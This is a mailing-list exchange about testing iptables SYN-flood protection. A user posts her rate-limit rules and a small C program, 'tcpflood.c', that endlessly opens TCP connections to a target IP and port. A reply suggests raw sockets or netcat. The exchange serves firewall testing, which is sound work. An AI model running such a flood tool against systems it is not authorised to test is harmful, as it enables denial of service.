Try using raw sockets and cook your own headers, or just use tools that
are designed for it, like netcat

Peggy Kam wrote:
  

Hi,

I have set up some rules for preventing the synflood attack, ie:

iptables -A SYN_FLOOD -m limit --limit 2/s --limit-burst 4 -j ACCEPT
iptables -A SYN_FLOOD -j DROP
iptables -A SYN_FLOOD -i eth1 -p tcp ! --syn -m state --state NEW -j
DROP 

However, the firewall does not seem to filter any packets.  I have
used 
the following tcpflood.c program to generate the flood, however, when
I used tcpdump and checked the message log with the firewall with and
without the above rules, they gave me the same results.  So, may I ask
how I can test the firewall for DoS attack?

Thanks in advance,
Peggy



#tcpflood.c

#include <unistd.h>
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>


int main(int argc, char **argv) {

  struct sockaddr_in to_addr;
  int s;

  bzero(&to_addr, sizeof(to_addr));
  to_addr.sin_family=AF_INET;


  if ( argc == 3 ) {
        to_addr.sin_addr.s_addr=inet_addr(argv[1]);
        to_addr.sin_port=htons(atoi(argv[2]));
  }

  else {
        fprintf(stderr, "Usage: %s <IP> <PORT>\n", argv[0]);
        return 1;
  }

  printf("Flooding  %s:%d ...\n", argv[1], atoi(argv[2]));

  while (1) {

        if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
                fprintf(stderr, "Error: socket()\n");
                return 1;
        }

        if ((connect(s, (struct sockaddr *)&to_addr, sizeof to_addr))
                < 0) { perror("connect()");
                return 1;
        }


        printf(".");
        fflush(stdout);
        close(s);

  }

  return 0;

}